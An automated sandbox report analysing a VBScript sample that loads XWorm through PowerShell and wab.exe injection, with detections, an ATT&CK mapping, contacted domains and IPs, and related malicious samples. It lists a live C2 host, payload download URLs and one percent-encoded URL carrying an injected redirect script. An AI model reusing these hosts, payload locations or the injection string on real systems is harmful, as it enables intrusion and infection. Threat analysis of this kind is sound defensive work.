              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 0000000B.00000002.2686700696.00000000226D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 6052, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 0000000B.00000002.2686700696.00000000226D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 6052, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information221
              Scripting              		Valid Accounts111
              Windows Management Instrumentation              		221
              Scripting              		112
              Process Injection              		1
              Masquerading              		OS Credential Dumping121
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts11
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Disable or Modify Tools              		LSASS Memory2
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		Logon Script (Windows)Logon Script (Windows)141
              Virtualization/Sandbox Evasion              		Security Account Manager141
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook112
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
              Obfuscated Files or Information              		LSA Secrets1
              File and Directory Discovery              		SSHKeylogging213
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Software Packing              		Cached Domain Credentials14
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446634 Sample: file.vbs Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 28 xwormmom53.duckdns.org 2->28 30 www.sendspace.com 2->30 32 3 other IPs or domains 2->32 46 Snort IDS alert for network traffic 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 54 9 other signatures 2->54 9 wscript.exe 1 2->9         started        signatures3 52 Uses dynamic DNS services 28->52 process4 signatures5 56 VBScript performs obfuscated calls to suspicious functions 9->56 58 Suspicious powershell command line found 9->58 60 Wscript starts Powershell (via cmd or directly) 9->60 62 3 other signatures 9->62 12 powershell.exe 14 20 9->12         started        process6 dnsIp7 38 fs03n5.sendspace.com 69.31.136.17, 443, 49708 GTT-BACKBONEGTTDE United States 12->38 40 www.sendspace.com 172.67.170.105, 443, 49705, 49706 CLOUDFLARENETUS United States 12->40 64 Suspicious powershell command line found 12->64 66 Very long command line found 12->66 68 Found suspicious powershell code related to unpacking or dynamic code loading 12->68 16 powershell.exe 15 12->16         started        19 conhost.exe 12->19         started        21 cmd.exe 1 12->21         started        signatures8 process9 signatures10 42 Writes to foreign memory regions 16->42 44 Found suspicious powershell code related to unpacking or dynamic code loading 16->44 23 wab.exe 14 16->23         started        26 cmd.exe 1 16->26         started        process11 dnsIp12 34 xwormmom53.duckdns.org 57.128.155.22, 49713, 8896 ATGS-MMD-ASUS Belgium 23->34 36 fs13n3.sendspace.com 69.31.136.57, 443, 49711 GTT-BACKBONEGTTDE United States 23->36

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.vbs29%ReversingLabsScript-WScript.Trojan.Guloader

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://crl.micro0%URL Reputationsafe
              https://aka.ms/pscore6lB0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://fs13n3.sendspace.com/c8f0aa7f6af4be82/664f6e17/8gikly/WySjCpJeTvpFxCC108.bin0%Avira URL Cloudsafe
              https://fs03n3.sendspace.com0%Avira URL Cloudsafe
              http://fs03n3.sendspace.com0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/ppxodmP0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/8gikly0%Avira URL Cloudsafe
              https://fs03n3.sendspace.com/dlpro/4b26f029f512f90f3568c85b6d26623d/664f6de9/ppxodm/Turde.jpb0%Avira URL Cloudsafe
              https://fs03n3.sendspaX0%Avira URL Cloudsafe
              https://www.sendspace.com/FW0%Avira URL Cloudsafe
              https://fs13n3.sendspace.com/dlpro/3a2e390c959a9f37c8f0aa7f6af4be82/664f6e17/8gikly/WySjCpJeTvpFxCC10%Avira URL Cloudsafe
              http://www.sendspace.com0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/8giklyM0%Avira URL Cloudsafe
              https://github.com/Pester/Pester0%Avira URL Cloudsafe
              https://www.sendspace.com/0%Avira URL Cloudsafe
              https://www.sendspace.com0%Avira URL Cloudsafe
              https://fs13n3.sendspace.com/0%Avira URL Cloudsafe
              https://fs13n3.sendspace.com/om:4430%Avira URL Cloudsafe
              https://fs03n5.sendspace.com/dlpro/ab0d4132c177b6677608eb6f24e68e83/664f6df0/ppxodm/Turde.jpb0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/ppxodm0%Avira URL Cloudsafe
              https://fs13n3.sendspace.com/_i0%Avira URL Cloudsafe
              http://fs03n5.sendspace.com0%Avira URL Cloudsafe
              https://fs03n5.sendspace.com0%Avira URL Cloudsafe
              xwormmom53.duckdns.org100%Avira URL Cloudmalware
              https://www.sendspace.com/pro/dl/ppxodmXR0%Avira URL Cloudsafe
              https://fs13n3.sendspace.com/dlpro/3a2e390c959a9f37c8f0aa7f6af4be82/664f6e17/8gikly/WySjCpJeTvpFxCC108.bin0%Avira URL Cloudsafe
              https://fs13n3.sendspace.com/eh0%Avira URL Cloudsafe
              https://fs13n3.sendspace.com/Di0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              fs13n3.sendspace.com
              		69.31.136.57
              		truefalse
                		unknown
                fs03n3.sendspace.com
                		69.31.136.17
                		truefalse
                  		unknown
                  xwormmom53.duckdns.org
                  		57.128.155.22
                  		truetrue
                    		unknown
                    fs03n5.sendspace.com
                    		69.31.136.17
                    		truefalse
                      		unknown
                      www.sendspace.com
                      		172.67.170.105
                      		truefalse
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://www.sendspace.com/pro/dl/8giklyfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://fs03n5.sendspace.com/dlpro/ab0d4132c177b6677608eb6f24e68e83/664f6df0/ppxodm/Turde.jpbfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.sendspace.com/pro/dl/ppxodmfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://fs13n3.sendspace.com/dlpro/3a2e390c959a9f37c8f0aa7f6af4be82/664f6e17/8gikly/WySjCpJeTvpFxCC108.binfalse
                        • Avira URL Cloud: safe
                        		unknown
                        xwormmom53.duckdns.orgtrue
                        • Avira URL Cloud: malware
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://fs03n3.sendspace.com/dlpro/4b26f029f512f90f3568c85b6d26623d/664f6de9/ppxodm/Turde.jpbpowershell.exe, 00000002.00000002.2030954213.0000016CA7569000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA7589000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA758D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA5893000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA58AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA58AB000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://fs03n3.sendspace.compowershell.exe, 00000002.00000002.2030954213.0000016CA75A0000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2143669387.0000016CB53E2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://fs03n3.sendspace.compowershell.exe, 00000002.00000002.2030954213.0000016CA758D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA58AF000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2030954213.0000016CA5597000.00000004.00000800.00020000.00000000.sdmptrue
                        • URL Reputation: malware
                        		unknown
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2030954213.0000016CA5597000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://fs13n3.sendspace.com/c8f0aa7f6af4be82/664f6e17/8gikly/WySjCpJeTvpFxCC108.binwab.exe, 0000000B.00000003.1931143615.0000000006E14000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://go.micropowershell.exe, 00000002.00000002.2030954213.0000016CA60F3000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.sendspace.com/pro/dl/ppxodmPpowershell.exe, 00000002.00000002.2030954213.0000016CA5597000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contoso.com/Licensepowershell.exe, 00000002.00000002.2143669387.0000016CB53E2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://fs03n3.sendspaXpowershell.exe, 00000002.00000002.2030954213.0000016CA758D000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 00000002.00000002.2143669387.0000016CB53E2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.sendspace.com/FWwab.exe, 0000000B.00000002.2672655270.0000000006DA8000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.sendspace.compowershell.exe, 00000002.00000002.2030954213.0000016CA58BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA7569000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://fs13n3.sendspace.com/dlpro/3a2e390c959a9f37c8f0aa7f6af4be82/664f6e17/8gikly/WySjCpJeTvpFxCC1wab.exe, 0000000B.00000003.1931143615.0000000006E14000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2030954213.0000016CA5597000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.sendspace.com/pro/dl/8giklyMwab.exe, 0000000B.00000002.2672655270.0000000006DE3000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.sendspace.compowershell.exe, 00000002.00000002.2030954213.0000016CA74FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA58BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA5781000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://fs13n3.sendspace.com/wab.exe, 0000000B.00000003.1931143615.0000000006E14000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.sendspace.com/wab.exe, 0000000B.00000002.2672655270.0000000006DA8000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://fs13n3.sendspace.com/_iwab.exe, 0000000B.00000003.1945545305.0000000006E14000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.1931143615.0000000006E14000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.micropowershell.exe, 00000008.00000002.1954692113.00000000077D6000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://aka.ms/pscore6lBpowershell.exe, 00000008.00000002.1946860119.0000000004E91000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/powershell.exe, 00000002.00000002.2143669387.0000016CB53E2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2143669387.0000016CB53E2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://fs13n3.sendspace.com/om:443wab.exe, 0000000B.00000003.1931143615.0000000006E14000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://fs03n5.sendspace.compowershell.exe, 00000002.00000002.2030954213.0000016CA5A1F000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://fs03n5.sendspace.compowershell.exe, 00000002.00000002.2030954213.0000016CA5A1F000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://aka.ms/pscore68powershell.exe, 00000002.00000002.2030954213.0000016CA5371000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2030954213.0000016CA5371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1946860119.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.2686700696.00000000226D1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://fs13n3.sendspace.com/Diwab.exe, 0000000B.00000003.1945545305.0000000006E14000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.2672655270.0000000006DFF000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://fs13n3.sendspace.com/ehwab.exe, 0000000B.00000003.1945545305.0000000006E14000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.1931143615.0000000006E14000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.sendspace.com/pro/dl/ppxodmXRpowershell.exe, 00000008.00000002.1946860119.0000000004FE8000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        57.128.155.22
                        		xwormmom53.duckdns.orgBelgium
                        		2686ATGS-MMD-ASUStrue
                        69.31.136.17
                        		fs03n3.sendspace.comUnited States
                        		3257GTT-BACKBONEGTTDEfalse
                        172.67.170.105
                        		www.sendspace.comUnited States
                        		13335CLOUDFLARENETUSfalse
                        69.31.136.57
                        		fs13n3.sendspace.comUnited States
                        		3257GTT-BACKBONEGTTDEfalse

                        General Information

                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1446634
                        Start date and time:2024-05-23 18:24:11 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 8m 1s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:15
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.vbs
                        Detection:MAL
                        Classification:mal100.troj.expl.evad.winVBS@12/7@5/4
                        EGA Information:
                        • Successful, ratio: 33.3%
                        HCA Information:
                        • Successful, ratio: 90%
                        • Number of executed functions: 63
                        • Number of non-executed functions: 2
                        Cookbook Comments:
                        • Found application associated with file extension: .vbs

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target powershell.exe, PID 5824 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 7772 because it is empty
                        • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: file.vbs

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        12:25:10API Interceptor520x Sleep call for process: powershell.exe modified
                        12:26:03API Interceptor244393x Sleep call for process: wab.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        57.128.155.22fresh_shrunk.exeGet hashmaliciousXWormBrowse
                          8QpxBYQvg1.exeGet hashmaliciousPureLog StealerBrowse
                            file.exeGet hashmaliciousGlupteba, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5SystemzBrowse
                              file.exeGet hashmaliciousGlupteba, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5SystemzBrowse
                                file.exeGet hashmaliciousRedLineBrowse
                                  CHZlSQKW3X.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, zgRATBrowse
                                    IkYqsQV4ty.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5SystemzBrowse
                                      51lz9Xlo4S.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5SystemzBrowse
                                        AkJ6Em8xAv.exeGet hashmaliciousGlupteba, LummaC Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, zgRATBrowse
                                          vxBrm6K24y.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, zgRATBrowse
                                            69.31.136.17update.vbsGet hashmaliciousGuLoaderBrowse
                                              DOCUMENTS.exe.htmlGet hashmaliciousUnknownBrowse
                                                JAN_YDHM007390.vbsGet hashmaliciousUnknownBrowse
                                                  UGH82MSGHWUSHSDHWQOL.vbsGet hashmaliciousUnknownBrowse
                                                    1st_Payment.vbsGet hashmaliciousRevengeBrowse
                                                      172.67.170.105time.vbsGet hashmaliciousGuLoaderBrowse
                                                        file300un.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                          69.31.136.57update.vbsGet hashmaliciousGuLoaderBrowse
                                                            time.vbsGet hashmaliciousGuLoaderBrowse
                                                              https://www.sendspace.com/file/dwfkjzGet hashmaliciousFormBookBrowse
                                                                #W002UHNSOP.vbsGet hashmaliciousUnknownBrowse
                                                                  1st_Payment_Copy.vbsGet hashmaliciousUnknownBrowse
                                                                    1st_Payment.vbsGet hashmaliciousRevengeBrowse
                                                                      QWMSA_Payment_Invoice0939.vbsGet hashmaliciousQuasarBrowse
                                                                        QA6433_#002.vbsGet hashmaliciousnjRatBrowse

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          www.sendspace.comtime.vbsGet hashmaliciousGuLoaderBrowse
                                                                          • 172.67.170.105
                                                                          https://www.sendspace.com/pro/dl/hg4kq5Get hashmaliciousUnknownBrowse
                                                                          • 172.64.104.11
                                                                          RFQ_#_1045981_-_MAA_D_Plant_Project_r01.exe.htmlGet hashmaliciousUnknownBrowse
                                                                          • 172.67.161.115
                                                                          https://www.sendspace.com/file/dwfkjzGet hashmaliciousFormBookBrowse
                                                                          • 104.21.91.185
                                                                          DOCUMENTS.exe.htmlGet hashmaliciousUnknownBrowse
                                                                          • 172.64.202.8
                                                                          SecuriteInfo.com.Trojan.KillProc2.9731.8373.22974.exeGet hashmaliciousGuLoaderBrowse
                                                                          • 172.64.108.22
                                                                          RdMr3o5vB2.exeGet hashmaliciousCryptOne, Djvu, Raccoon Stealer v2, SmokeLoader, SocelarsBrowse
                                                                          • 172.67.141.102
                                                                          New Order.exeGet hashmaliciousOski Stealer VidarBrowse
                                                                          • 172.67.141.102
                                                                          QzvyuYJlDX.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.21.41.17
                                                                          XZ22CfAOCN.exeGet hashmaliciousRedLine SmokeLoader Tofsee VidarBrowse
                                                                          • 172.64.173.34
                                                                          fs03n3.sendspace.comUHNMA702NQ.vbsGet hashmaliciousUnknownBrowse
                                                                          • 69.31.136.17
                                                                          fs03n5.sendspace.comUGH82MSGHWUSHSDHWQOL.vbsGet hashmaliciousUnknownBrowse
                                                                          • 69.31.136.17
                                                                          fs13n3.sendspace.com1st_Payment_Copy.vbsGet hashmaliciousUnknownBrowse
                                                                          • 69.31.136.57

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          CLOUDFLARENETUSupdate.vbsGet hashmaliciousGuLoaderBrowse
                                                                          • 104.21.28.80
                                                                          time.vbsGet hashmaliciousGuLoaderBrowse
                                                                          • 172.67.170.105
                                                                          windows.vbsGet hashmaliciousUnknownBrowse
                                                                          • 188.114.96.3
                                                                          https://neuraxpharm.eurosbiolab.eu/?__cf_chl_rt_tk=TES3LKGEhjH1G5Ym.iTFDxwaSWwxOocOm2ySKfq7pJU-1716481117-0.0.1.1-1621Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                          • 104.17.2.184
                                                                          http://0x00003.000375.64090/images.php?p=%31%30%30%35%32%30%30%30%30%36%33%39%22%3E%3C%2F%64%69%76%3E%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%5B%27%6C%6F%63%61%74%69%6F%6E%27%5D%5B%27%72%65%70%6C%61%63%65%27%5D%28%5B%27%68%74%74%70%73%3A%2F%2F%69%6D%70%75%74%65%6C%65%74%74%65%27%2C%20%27%72%2E%63%6F%6D%2F%30%2F%30%2F%30%2F%27%2C%20%27%39%65%36%37%33%38%30%34%63%65%35%37%37%30%32%34%33%32%63%30%65%31%66%65%33%61%63%33%35%38%39%62%27%2C%27/12/101/10542/964/156117/16845%27%5D%5B%27%6A%6F%69%6E%27%5D%28%27%27%29%29%2C%64%6F%63%75%6D%65%6E%74%5B%27%62%6F%64%79%27%5D%5B%27%73%74%79%6C%65%27%5D%5B%27%6F%70%61%63%69%74%79%27%5D%3D%30%78%30%3B%3C%2F%73%63%72%69%70%74%3EGet hashmaliciousPhisherBrowse
                                                                          • 188.114.96.3
                                                                          ELECTRONIC RECEIPT_Europait.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                          • 104.17.2.184
                                                                          30% Down Payment Slip.pdf_______________________________________________________.exeGet hashmaliciousAgentTeslaBrowse
